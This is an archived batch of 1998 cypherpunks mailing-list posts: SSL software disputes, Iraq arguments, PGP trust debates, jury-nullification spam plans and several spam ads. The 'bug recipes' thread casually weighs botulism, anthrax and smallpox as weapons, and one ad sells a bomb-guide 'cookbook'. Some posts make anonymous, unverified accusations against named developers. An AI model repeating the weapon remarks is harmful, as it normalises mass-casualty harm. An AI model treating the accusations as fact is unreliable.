                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "jim finder" <jim_finder@hotmail.com>
Date: Fri, 25 Dec 1998 02:14:51 +0800
To: coderpunks@toad.com
Subject: What's up with C2 and SSL?
Message-ID: <199812241744.JAA06583@law-f104.hotmail.com>
MIME-Version: 1.0
Content-Type: text/plain



Would someone mind explaining the background of this
dispute? I've seen posted several vague accusations that
imply that (depending on the poster) either Sameer or Ben
have acted badly and unwisely in some way, and that at least one
of them has a "bad track record" with open source software.

I don't have enough information to judge, which I expect is
also the case for many other readers here. Could someone
please lay out exactly what this bad track record is, and
what was wrong with Sameer and Ben's announcements? Otherwise
we all just have to guess what is going on here. Also, what
happened with SSLeay?

Either that, or stop making public accusations.

Jim


______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@nowhere.to>
Date: Thu, 24 Dec 1998 14:15:20 +0800
To: cypherpunks@cyberpass.net
Subject: No Subject
Message-ID: <2d8061e553fb3e96846222e7893c31a9@anonymous>
MIME-Version: 1.0
Content-Type: text/plain



INTELLIGENT VIRUS INVADES NT SERVERS

A new computer virus that attacked 10 MCI Worldcom networks last week is
capable of spreading throughout computer networks and scrambling the
documents on those networks as it goes.  "We've never seen anything this
sophisticated in 10 years of doing this," says Network Associates' general
manager of network security.  "This is a completely new strain of virus and
the first we've seen that propagates itself with no user interaction."  The
"Remote Explorer" virus runs on Microsoft Windows NT servers and affects
common programs like Microsoft Word.  Users clicking on their Word icon
might experience a slight delay, but otherwise would be unable to detect
the presence of the virus;  meanwhile, the virus is busy corrupting files and
spreading to other programs.  Microsoft officials say they're "aware of
other viruses that have the same characteristics," and Network Associates
says it has developed a Remote Explorer detector and is working on a
solution to decode the affected files.  

(Wall Street Journal 22 Dec 98)


#!/usr/local/bin/perl -0777-- -export-a-crypto-system-sig -RC4-3-lines-PERL
@k=unpack('C*',pack('H*',shift));for(@t=@s=0..255){$y=($k[$_%@k]+$s[$x=$_
]+$y)%256;&S}$x=$y=0;for(unpack('C*',<>)){$x++;$y=($s[$x%=256]+$y)%256;
&S;print pack(C,$_^=$s[($s[$x]+$s[$y])%256])}sub S{@s[$x,$y]=@s[$y,$x]}





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Reeza! <howree@cable.navy.mil>
Date: Thu, 24 Dec 1998 13:58:29 +0800
To: Missouri FreeNet Administration <measl@mfn.org>
Subject: Re: I must admit. . .
In-Reply-To: <3.0.5.32.19981223061138.00acf7b0@205.83.192.13>
Message-ID: <3.0.5.32.19981224151942.0388eb40@205.83.192.13>
MIME-Version: 1.0
Content-Type: text/plain



At 08:18 PM 12/22/98 -0600, Missouri FreeNet Administration wrote:
>
>:>Hrmm... And we have never "sanctioned" (gotta love those innocuous
>:>euphemisms) any soveriegn State?  What good for the goose is not good for
>:>the gander?  I repeat, *what gives us the RIGHT* to determine his weaponry
>:>or lack thereof?
>:
>:Perhaps if you cited a few examples, your counter-point would have some
>:weight. 
>
>How about Iraq itself???

Do you view our bombing Iraq as sanction? Or as retaliation for their
sanction of Kuwait? Later, is our bombing of Iraq sanction, or follow
through on our warning in light of Husseins continued thwarting of UN
inspectors? 

I don't think Iraq measures up as an example of a sovereign nation the US
sactioned. You would have been better off listing the anti-terrorist
strikes in the Sudan and Afghanistan, but even those were not "sanctions"
in the same sense that Iraq-Kuwait were.

>:>:Your arguments would be better applied to Somalia and Bosnia than they are
>:>:to Iraq. Our presence in those countries was of a slightly different
>:>:character than it is in Iraq now isn't it???
>:>Yes indeed.  In these two countries we were there only to watch over the
>:>slaughter, not to perpetuate it ourselves.  Mustv'e ruined your Military
>:>Day (tm), huh Reeza?
>:
>:(yawn) not really. Actually, any involvement we have with the UN gets on my
>:nerves. Interesting, the way you ignore the differences between "internal
>:conflict" and "aggression against a sovereign neighbor".
>
>I don't see any difference when *we* are the ones injecting ourselves into
>it.  Why don't you point them out to me?

Lead the horse to water, and make him drink? The evidence is there to be
seen, one need only be willing to see. Yes, that knife cuts both ways.
Boils down to ideological differences. 

I believe in defense through a strong offense (threat of retaliation) and
carrying out that retaliation when provoked. I do not see eye to eye with
everything the UN does, that does not mean I'm willing to allow one
expansionist dictator to sanction another country and gain control of
enough of the worlds oil supply to impact the well-being of my country. Nor
does it mean we (the US) should become totally isolationist. With the hue
and cry from the world community, I believe our/the UN retaliation against
Iraqs sanction of Kuwait is, and always will be justifiable.

I view Somalia and the Bosnia fiascos differently, they are internal
conflicts. In Bosnia, there is the added factor of "ethnic cleansing". 

I'm reminded of the truisms about how a drowning man will accept help from
any source, and that a wild animal will bite the hand that feeds it. I'm
personally leary of any involvement with those internal conflicts because
it is interfering with that 'survival of the fittest' thing. 

Reeza!
============================================================================
DH Key available upon request.


The affairs of Men rarely rely on the dictates of logic, or even common sense.


	"Yeah, they mostly rely on something below the belt."

				-- my older sister




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Fri, 25 Dec 1998 05:45:25 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Norway - go to jail for naming baby illegal [CNN]
Message-ID: <199812242142.PAA01446@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> X-within-URL: http://www.cnn.com/WORLD/europe/9812/23/BC-Norway-NameLaws.ap/

> Mother of 14 jailed for violating Norway's baby-name law
> 
>    December 23, 1998
>    Web posted at: 9:52 AM EST (1452 GMT)
>    
>    
>    OSLO, Norway (AP) -- A mother of 14 was jailed this week because she
>    refused to change the name she picked for her young son, even though
>    that violated Norway's name law.
>    
>    Kirsti Larsen, 46, told the Verdens Gang newspaper that she named her
>    son Gesher after she dreamed the child should be named "bridge."
>    Gesher means bridge in Hebrew.
>    
>    Norway has strict laws regulating names, including lists of acceptable
>    first and last names. In 1995, Larsen tried to register her son's name
>    as Gesher at her local county office, which rejected the choice as
>    illegal.

[text deleted]


    ____________________________________________________________________

          What raises the standard of living may well diminish the
          quality of life.

                                                 The Club of Rome

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ASCOLI63@aol.com
Date: Fri, 25 Dec 1998 08:08:21 +0800
Subject: Hottest deals on wholesale products! Make big $$
Message-ID: <85e9597a.3682ab6c@aol.com>
MIME-Version: 1.0
Content-Type: text/plain



Looking to market a product on the net?
Tired of working for others and dealing with huge amounts of paper work?

<A HREF="http://members.aol.com/giget7485/">Click-N-Go! USA WHOLESALE
DIRECTORY DISK</A>

You already know people are making small fortunes selling products online.
They buy low and sell for 3 to 4 times what they paid for the products! What
are you waiting for?

We show you how to sell your products!
We show you where to get the hottest deals on wholesale products!

Get More Information on how to become part of the winning edge of marketing
your own products online.  No signup fee's because its YOUR business.  Little
to no inventory investment or advertising investment, be your own boss with no
crap.

<A HREF="http://members.aol.com/giget7485/">Click here for more information
</A>

I'm making money and you can too!  We can do it together!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Fri, 25 Dec 1998 00:35:55 +0800
To: cypherpunks@cyberpass.net
Subject: I want to spam the Jury Duty information
Message-ID: <199812241607.RAA29858@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



I think about putting up about $200 or so (whetever a decent spamming 
will cost me) and spam the internet with the information about jurors
rights and jury nullification.

Anyone thinks that it is a good idea?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brynyab@aol.com
Date: Fri, 25 Dec 1998 09:14:07 +0800
Subject: HUGE FORBIDDEN INFORMATION LIBRARY
Message-ID: <83059c50.3682bb69@aol.com>
MIME-Version: 1.0
Content-Type: text/plain



The Sanarchist Cookbook

Known as the world most forbidden information source and outlawed in many
nations this book was thought to be banished from the face of the Earth.

HUGE FORBIDDEN INFORMATION LIBRARY
220 pages of the massive book of Anarchy 

Learn the tricks of the trade written by the skilled hands of the Sanarchist.
Including massive amounts of information on building home made weapons like
the potato shooter to making dollar bills that can be used continuously in
coke machines this book can pull you out of any jam.  If you are interested in
those great WWII bomb guides & handbooks this thing has them all!

We are set out to distribute this book to anyone that is interested and it
comes by mail(sorry we can't post it on the web because no web server will
support us).  

We have been selling this product for almost two months now and have processed
hundreds of orders.  This book is great, we have had no complaints on it, and
we will never have any complaints on it its so good.  If this is the only
product you ever order off the Internet then you have picked a good choice.
Our price is low and the product is great!

Send payment of $7.50 to the address below to receive your cookbook by mail.

K.C. Smith
P.O. Box 9141
Evansville, IN 47724

Questions/Comments or to be removed: CrackerDude@mailcity.com!

We will remove your RIGHT AWAY!  We got your email address from
www.Extractor.com!
I am giving you my address and information so clearly this is not a sick
scheme to take your money. 
Expect 3-7 Days to Receive your cookbook. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@nowhere.to>
Date: Thu, 24 Dec 1998 16:21:34 +0800
To: cypherpunks@cyberpass.net
Subject: Is Sameer/C2net Attempting to subvert the OpenSSL and Mod-ssl projects
Message-ID: <e7da8d968f05e9013ee1302f84dfadfd@anonymous>
MIME-Version: 1.0
Content-Type: text/plain



To: cypherpunks@cyberpass.net
cc:
Subject: OpenSSL and C2Nets attempted subversion of same(Sameers track record
--------
On the Subject of Sameers record with open source

  mod_ssl.c(this was the component that Sameer wishes wasnt
available(and did his best to deny to his customers) and indeed was quite
sucessful in preventing its availability until Ralf Engleschall's mod_ssl becam
available... This is the REAL reason C2net took a nose dive...)
and now it appears Sameer is trying to co-opt that project also.

I trust Ben Laurie and Ralf... They developed the code .

I DONT trust Sameer... he is simply a privateer, he takes sources
and trys to restrict availability so he can make a profit from
Intellectual Property NOT developed by him...
I specifically suspect his announcement coming on the heels of Ben's.
I dont think this person will ever get a clue about either Open Source
or GPL.


     merry Xmas
     the baby ruth bar in the swimming pool :)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: DOOM Anonymous Untraceable User <nobody@seclab.com>
Date: Fri, 25 Dec 1998 01:43:03 +0800
To: cypherpunks@cyberpass.net
Subject: Assault on Civil Liberties
Message-ID: <199812241705.SAA05945@rogue.seclab.com>
MIME-Version: 1.0
Content-Type: text/plain



<http://www.sjmercury.com/columnists/gillmor/docs/dg121398.htm>

"Civil liberties and privacy grew more tenuous. The
Clinton administration maintained its record of utter
unfriendliness toward the Bill of Rights as it applies
to technology. The administration's hard-line stand
on encryption, the scrambling of data to keep it away
from prying eyes, shows no signs of moderation. And
the administration pursued the absurd notion, which
flies utterly in the face of reality, that private
businesses can regulate themselves in ways that
protect consumers' privacy."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@sprynet.com>
Date: Fri, 25 Dec 1998 11:56:44 +0800
To: Pallas Anonymous Remailer <cypherpunks@Algebra.COM
Subject: Re: bug recipes
In-Reply-To: <0c21a12a18cbe07b583b092c04c69544@anonymous>
Message-ID: <3.0.5.32.19981224192449.0083eba0@m7.sprynet.com>
MIME-Version: 1.0
Content-Type: text/plain



At 11:28 PM 12/23/98 -0800, Pallas Anonymous Remailer wrote:
>doubt a skeleton could harbor usable smallpox but I am not up on my
biology >tonight.
> --Skrill

IANA microbio, but recently someone sequenced enough pathogen in
an unearthed bubonic victim's dental plaque to confirm Mr. yersinia's role...

Lets hope the crazies realize the containment problems...










  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Missouri FreeNet Administration <measl@mfn.org>
Date: Fri, 25 Dec 1998 10:29:15 +0800
To: Reeza! <howree@cable.navy.mil>
Subject: Re: I must admit. . .
In-Reply-To: <3.0.5.32.19981224151942.0388eb40@205.83.192.13>
Message-ID: <Pine.BSF.3.96.981224194210.1713A-100000@greeves.mfn.org>
MIME-Version: 1.0
Content-Type: text/plain



On Thu, 24 Dec 1998, Reeza! finally got to the point of the matter:

<massive snip>
:, that does not mean I'm willing to allow one
:expansionist dictator to sanction another country and gain control of
:enough of the worlds oil supply to impact the well-being of my country.

I believe this is the the only true argument here.  The US (and you) are
not "pleased" with the fact that the one place on the planet that has the
worlds largest oil deposits is not beholden to the USG.  If Hussein were
to have remained a US puppet, he could do pretty much as he damn well
pleased, anywhere he damn well pleased - just as long as OUR oil prices
didn't escalate.  

	Weren't the old days wonderful?  A time when the USG could force
countries like Iraq to sell oil at or below cost?  And isn't that the
entire point of "allowing" Iraq to sell oil at the rate of some 50 billion
dollars every six months (IIRC)?  On the one hand, we "embargo" all food
and medicines, for their own good of course, and on the other hand we are
"willing" to forego that embargo, *if it benefits us*.  

	This has ZERO to do with Kuwait or weaponry, and *everything* to
do with the US id - we want *what* we want, *when* we want it, and at the
*price* we want it, *OR ELSE*.

Yours, 
J.A. Terranson
sysadmin@mfn.org

--
If Governments really want us to behave like civilized human beings, they
should give serious consideration towards setting a better example:
Ruling by force, rather than consensus; the unrestrained application of
unjust laws (which the victim-populations were never allowed input on in
the first place); the State policy of justice only for the rich and 
elected; the intentional abuse and occassionally destruction of entire
populations merely to distract an already apathetic and numb electorate...
This type of demogoguery must surely wipe out the fascist United States
as surely as it wiped out the fascist Union of Soviet Socialist Republics.

The views expressed here are mine, and NOT those of my employers,
associates, or others.  Besides, if it *were* the opinion of all of
those people, I doubt there would be a problem to bitch about in the
first place...
--------------------------------------------------------------------







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Fri, 25 Dec 1998 03:49:50 +0800
To: cypherpunks@cyberpass.net
Subject: No Subject
Message-ID: <199812241924.UAA09287@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Well if you are going to go to the trouble and expense, then you
should also put something in there to educate the masses about
how to use crypto to protect themselves, and why this is a good
idea.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Fri, 25 Dec 1998 04:12:10 +0800
To: cypherpunks@cyberpass.net
Subject: Re: I want to spam the Jury Duty information
In-Reply-To: <199812241809.KAA15486@slack.lne.com>
Message-ID: <199812241951.UAA11587@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



  >> I think about ... and spam the internet...
  >> Anyone thinks that it is a good idea?

  > No, it's a bad idea.  The ends do not justify the means.

Worse, the *only* end you'll achieve is to piss off nearly everyone
who *might* have been interested in what you had to say (and getting
your name added to the Black Hole database and tens of thousands of
individual kill files).

Get real -- is there *anyone* on the net who treats unsolicited email
as anything other than unadulterated dreck?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Secret Squirrel <secret_squirrel@nym.alias.net>
Date: Fri, 25 Dec 1998 05:35:42 +0800
To: cypherpunks@cyberpass.net
Subject: JFK
Message-ID: <ec1feaf7d178f946870051622a210120@anonymous>
MIME-Version: 1.0
Content-Type: text/plain



"The basis of effective government is public confidence, and that
confidence is endangered when ethical standards falter or appear to
falter."
- JFK




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Alten <Alten@home.com>
Date: Fri, 25 Dec 1998 14:57:40 +0800
To: Patrick Feisthammel <pafei@rubin.ch>
Subject: Re: mysterious PGP release-signing keys
In-Reply-To: <3.0.3.32.19981223195440.00b29970@mail>
Message-ID: <3.0.3.32.19981224212522.009fd100@mail>
MIME-Version: 1.0
Content-Type: text/plain



>> This is yet another a good example of why one should never confuse using
PK 
>> certificates with security.  An email PGP signature looks impressive but in
>> practice it is useless.
>
>It is usefull iff you can verify the validity of the used PK certificate.
>That's what the web of trust in PGP is for.
>

Unfortunately the "if" is false.  I have no idea if your fancy PK signature 
really represents you.  Just look at the recent trouble Black Unicorn has 
had with someone else using the same name affiliated with a key stored on 
the Network Associates PGP key server. Dave could not verify a PK signature 
for the PGP software distribution itself.  PKI, or a web of trust, looks 
good on paper but in practice it does not work when scaled up to large 
numbers of networked users.

- Alex
--

Alex Alten

Alten@Home.Com
Alten@TriStrata.Com

P.O. Box 11406
Pleasanton, CA  94588  USA
(925) 417-0159




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Fri, 25 Dec 1998 12:02:45 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Forwarded mail...
Message-ID: <199812250405.WAA02538@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Thu, 24 Dec 1998 19:50:34 -0600 (CST)
> From: Missouri FreeNet Administration <measl@mfn.org>
> Subject: Re: I must admit. . .

> On Thu, 24 Dec 1998, Reeza! finally got to the point of the matter:
> 
> <massive snip>
> :, that does not mean I'm willing to allow one
> :expansionist dictator to sanction another country and gain control of
> :enough of the worlds oil supply to impact the well-being of my country.
> 
> I believe this is the the only true argument here.  The US (and you) are
> not "pleased" with the fact that the one place on the planet that has the
> worlds largest oil deposits is not beholden to the USG.

Actualy there are equivalent oil and gas deposits in SE Asia and Antartica.
But they doesn't belong to the USG either.

Of course the point is valid. Though it almost begs the question of why in
such a situation there is not a more powerful search for alternatives. There
are actualy very few technologies that care whether oil or gas is used in
energy production or some entirely different process.




    ____________________________________________________________________

          What raises the standard of living may well diminish the
          quality of life.

                                                 The Club of Rome

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Soren <sorens@workmail.com>
Date: Fri, 25 Dec 1998 10:32:46 +0800
To: cypherpunks@cyberpass.net
Subject: Re: EAY, SSLeay, and Open Source (Re: [ssl-users] Re: C2Net announces OpenSSL Project)
In-Reply-To: <199812242235.WAA09814@server.eternity.org>
Message-ID: <368302FD.81FE80B3@workmail.com>
MIME-Version: 1.0
Content-Type: text/plain





Adam Back wrote:

> This is confusing, several people have alluded that there will be no
> future versions of SSLeay from Eric and friends.  Would someone in the
> know care to divulge the goods: why is this?
>
> Has Eric suffered an accident?  Been incarcerated by the Australian
> spooks in retaliation for major contributions to crypto deployment?
> Has he been bought out by the dark side (say microsoft?).  Had a major
> change of philosophy regarding open source?  EAY was amongst the
> "least likely to go closed source" I thought.
>
> What gives?

I seem to to recall sometime ago when he was being pressured by the Oz
Gubmint, and decided that going corporate was a decent way out.  From what
I recall, he ended up on the RSA payroll.

Sayonara buggy freeware.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Reeza! <howree@cable.navy.mil>
Date: Thu, 24 Dec 1998 20:39:32 +0800
To: cypherpunks@cyberpass.net
Subject: Re: bug recipes
In-Reply-To: <19981224081650.17846.qmail@hotmail.com>
Message-ID: <3.0.5.32.19981224221959.007bda00@205.83.192.13>
MIME-Version: 1.0
Content-Type: text/plain



At 12:16 AM 12/24/98 PST, uhm, yeah.. wrote:
>>
>>..someone describes the use of mutton for anthrax breeding..
>>
>What?
>
>>The mils are already vaccinated, so anthrax is passe.  What
>>you *really* want to do is dig up a smallpox victim...
>>
>You must have a lot of time on your hands, eh?
>
>- neotek
>

I've said this offlist twice already.

Botulism doesn't have the military appeal of anthrax, but is more easily
cultivated, disseminated, and will not result in the knee-jerk reaction
once it is diagnosed. 

The original poster did not rise to the challenge of the 24 hour time
limit, as I anticipated. My goal was to for him to justify his position, or
make him shut up.  

He sounded like Chicken Little. 

There was some noise, but no recipe from that original poster. Time out, I
rest my case. 

The link Petro posted was hilarious BTW, 

Reeza!


============================================================================
DH Key available upon request.


The affairs of Men rarely rely on the dictates of logic, or even common sense.


	"Yeah, they mostly rely on something below the belt."

				-- my older sister




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "jim finder" <jim_finder@hotmail.com>
Date: Fri, 25 Dec 1998 13:33:45 +0800
To: apache-ssl@lists.aldigital.co.uk
Subject: Re: Sammers    eers Theft  of Ben lauries Intellectual
Message-ID: <19981225051204.19697.qmail@hotmail.com>
MIME-Version: 1.0
Content-Type: text/plain



Anonymous writes:

>For the clueless or history deficient
>
>C2 gots its start by purloining without compensation
>Ben Lauries Apache-SSL patches.... Sameer used these and then
>had the fucking gall to remove source from apache-ssl
>for the mod_ssl.c... all was rosy until Ralf releases
>a mod_ssl.c of his design... result??
>C2's business worlwide took a nose dive...(layoffs etc)
>so now Sameer is trying to coopt Ralf's mod_ssl.c project
>(mark my words if Sameer gets his way the source for future
>verions will NOT be available no matter what he says now...)
>I seen it happen once so now when the litte sob trys it
>again I am blowing the whistle...(and retelling history openly)
>how about it Sameer are you now going to Sue the Mix network:) ?
>
>    the turds in Sameers Swimming pool
>p.s. to the clueless Jim Finder..Happy now asshole...?

No, I'm afraid I'm not.

Could you offer either verifiable evidence of the above, or at
least back up your accusation by signing your name? Either would
be better than making an anonymous accusation that we have no
way to verify. I'm sorry I wasn't privy to what ever went on
behind the scene between C2NET, Ben, Ralf, Eric, etc., but
I think I speak for most readers when I admit that I wasn't.
Ben made a serious accusation that an important member of
the open sources and crypto community has a hidden agenda
to subvert the availability of open source crypto code. If it
is false, let this stop. If it's true, then let's shout it
far and wide, and deny them the support of the community.
Anonymous and unverifiable accusations advance neither
case

All I've seen so far is Ben and Sameer throwing shit at
each other, egged on by anonymous flamers, without anymone
bothering to provider enough information for an outsider to
decide how much of it should stick. Right now, all I can
conclude is that there is plenty of shit to go around.

Ben, would you please spell out your side of the story, and
Sameer, would you do likewise so that we can figure this out?
Anonymous, put up or shut up.

Jim



______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Fri, 25 Dec 1998 17:46:21 +0800
To: "jim finder" <apache-ssl@lists.aldigital.co.uk
Subject: Re: Sammers    eers Theft  of Ben lauries Intellectual
In-Reply-To: <19981225051204.19697.qmail@hotmail.com>
Message-ID: <199812250927.BAA06007@proxy4.ba.best.com>
MIME-Version: 1.0
Content-Type: text/plain



    --
At 11:12 PM 12/24/98 -0600, jim finder wrote:
> All I've seen so far is Ben and Sameer throwing shit at 
> each other, egged on by anonymous flamers, without anymone 
> bothering to provider enough information for an outsider to 
> decide how much of it should stick.

Probably none of it should stick:  This a dispute over forking the source.

The community should support the fork that comes out with the most good
code and sound design, rather than the fork that throws the most mud.

And it probably will.

    --digsig
         James A. Donald
     6YeGpsZR+nOTh/cGwvITnSR3TdzclVpR0+pr3YYQdkG
     8dYM2+HBC2DOTPZd47psy4oa6jQrtoVVJul6/wR6
     4ld5hqkTmnsShU9zXzjoabREGevAsHFbEwShXZxGJ
-----------------------------------------------------
We have the right to defend ourselves and our property, because 
of the kind of animals that we are. True law derives from this 
right, not from the arbitrary power of the omnipotent state.


http://www.jim.com/jamesd/      James A. Donald




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ocnarb@usa.net
Date: Fri, 25 Dec 1998 15:33:03 +0800
To: cypherpunks@toad.com
Subject: A #1 SECRET PROFIT MACHINE!!!
Message-ID: <199812250703.PAA06394@home.>
MIME-Version: 1.0
Content-Type: text/plain



            We'll Pay You To Make Our Phone Ring...

ALL YOU DO IS ADVERTISE OUR 800 NUMBER - THAT'S ALL !

* You get $100 for EVERY SALE plus ENDLESS RESIDUALS! 
* Just MAKE OUR PHONE RING ! 
* Easiest, most profitable business around! 
* You can earn thousands of $$ your very first month ! 
* No selling required - our expert sales team closes sales for you! 
* We send out huge checks weekly! 
* No meetings, phone calls, no hassles! 
* Advertise any way you want - email, flyers, classifieds, postcards, etc.

 CALL NOW: 1-800-811-2141 
(ID # 60282)

 If you are an average person like myself who has always wanted to
generate a large easy income from home, but you don't want the hassles of
inventory, marketing plans, or direct selling, then THIS IS FOR YOU. All
you do is advertise our 800 number and yo ur ID number, and our trained
staff do the rest for you. 

Don't just take my word for it - listen to some amazing testimonials from
existing members: 

1-888-446-6951 (He made $10,000 his first month) 
1-888-446-6949 (He erased all his debt in one month) 
1-888-715-0642 (She averages $1,000 every week) 
1-888-703-5389 (He can't believe it's this easy)

 You also have the peace of mind of offering one of the best products
available: a lifetime membership in a discount service providing
guaranteed lowest prices on over 250,000 products and services. Hotel &
Travel Services, Major Appliances, Dentists, Legal Services, 8.9
cents/minute long-distance, Groceries... 

 YOU CAN START TODAY - CALL NOW: 1-800-811-2141 (ID # 60282) 8am - 10pm
CST Mon-Sat.

If you wish to be removed simply place remove in the subject area and you will be removed
from the list.  Thank you!   Have a great Holiday!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Fri, 25 Dec 1998 11:30:17 +0800
To: coderpunks@toad.com
Subject: Sammerseers Theft  of Ben lauries Intellectual Property(i.e.apache
Message-ID: <199812250309.EAA07755@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



To: cypherpunks@cyberpass.net
cc:
Subject: Sameers ande C2 Nets Appropriation of Apache-SSL(Bens Code)
--------

For the clueless or history deficient

C2 gots its start by purloining without compensation
Ben Lauries Apache-SSL patches.... Sameer used these and then
had the fucking gall to remove source from apache-ssl
for the mod_ssl.c... all was rosy until Ralf releases
a mod_ssl.c of his design... result??
C2's business worlwide took a nose dive...(layoffs etc)
so now Sameer is trying to coopt Ralf's mod_ssl.c project
(mark my words if Sameer gets his way the source for future
verions will NOT be available no matter what he says now...)
I seen it happen once so now when the litte sob trys it
again I am blowing the whistle...(and retelling history openly)
how about it Sameer are you now going to Sue the Mix network:) ?

    the turds in Sameers Swimming pool
p.s. to the clueless Jim Finder..Happy now asshole...?
BTW I will post when and where I feel like !




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Fri, 25 Dec 1998 12:03:02 +0800
To: Eric Murray <cypherpunks@cyberpass.net
Subject: and justice for all but the Goldmans and Jones
Message-ID: <199812250338.EAA09396@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



At 10:09 AM 12/24/98 -0800, Eric Murray wrote:
>Anonymous writes:
> 
>> I think about putting up about $200 or so (whetever a decent spamming 
>> will cost me) and spam the internet with the information about jurors
>> rights and jury nullification.
>> 
>> Anyone thinks that it is a good idea?
>
>No, it's a bad idea.  The ends do not justify the means.
>

The ends: justice.  

The means: a common abuse, which perchance should be illegal like junkfax,
but isn't.  The means: in the late 90s the people had the chance, for a few
years, before the XC Massacre, to publish without convincing corporations.

Do the math.









  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Fri, 25 Dec 1998 12:03:09 +0800
To: cypherpunks@cyberpass.net
Subject: land of the free
Message-ID: <199812250340.EAA09452@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



At 08:24 PM 12/24/98 +0100, Anonymous wrote:
>Well if you are going to go to the trouble and expense, then you
>should also put something in there to educate the masses about
>how to use crypto to protect themselves, and why this is a good
>idea.

Trouble and expense of what?  If you refer to the FIJA spamming,
then you will simply confuse the sheeple with too many issues.








  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Fri, 25 Dec 1998 12:10:55 +0800
To: cypherpunks@toad.com
Subject: spamactivism
Message-ID: <199812250347.EAA10171@replay.com>
MIME-Version: 1.0
Content-Type: text/plain




At 05:07 PM 12/24/98 +0100, Anonymous wrote:
>I think about putting up about $200 or so (whetever a decent spamming 
>will cost me) and spam the internet with the information about jurors
>rights and jury nullification.
>
>Anyone thinks that it is a good idea?

Education can only be for the good.

Got an anonymous ecash account of some sort?  In either case, kudos.








  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Frederick Burroughs <riburr@shentel.net>
Date: Fri, 25 Dec 1998 21:14:40 +0800
To: Cypherpunks <cypherpunks@ns.minder.net>
Subject: Re: Forwarded mail...
In-Reply-To: <3.0.5.32.19981225192104.00b00100@205.83.192.13>
Message-ID: <36838BA9.1BE2E8DF@shentel.net>
MIME-Version: 1.0
Content-Type: text/plain





Reeza! wrote:

> I agree we should be pursuing alternative energies with greater diligence,
> I'd like to see what the petroleum companies have on their shelves and are
> suppressing.

I bet there's a lot of shelf space (and mercenary funding) devoted to making
profits from Caspian Sea oil. Voluminous oil reserves, land-locked, begging for a
drainage shunt into the Black Sea, Mediterranean or Persian Gulf. The Persian Gulf
heads the list except that pipelines would traverse enemy territory.

Well, well, well... Iraq has interesting possibilities. Demonize the present head
of state and his regime, use US military to soften up the resistance, incite
opposition movements, oil companies merge to fund the insurgency...  drooling over
the thought of getting in on the ground floor. Then kick back as oil flow meters
spin like slot machines that pay out every spin. We'd be stupid not to play.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Missouri FreeNet Administration <measl@mfn.org>
Date: Fri, 25 Dec 1998 23:52:45 +0800
To: Anonymous <nobody@replay.com>
Subject: Re: spamactivism
In-Reply-To: <199812250347.EAA10171@replay.com>
Message-ID: <Pine.BSF.3.96.981225092338.2614C-100000@greeves.mfn.org>
MIME-Version: 1.0
Content-Type: text/plain



Go for it.  You *may* even be able to help raise this money by
solicitation of LEO's.  No, I am *not* kidding here, I know several who
are *very* active in this area...

Yours, 
J.A. Terranson
sysadmin@mfn.org

--
If Governments really want us to behave like civilized human beings, they
should give serious consideration towards setting a better example:
Ruling by force, rather than consensus; the unrestrained application of
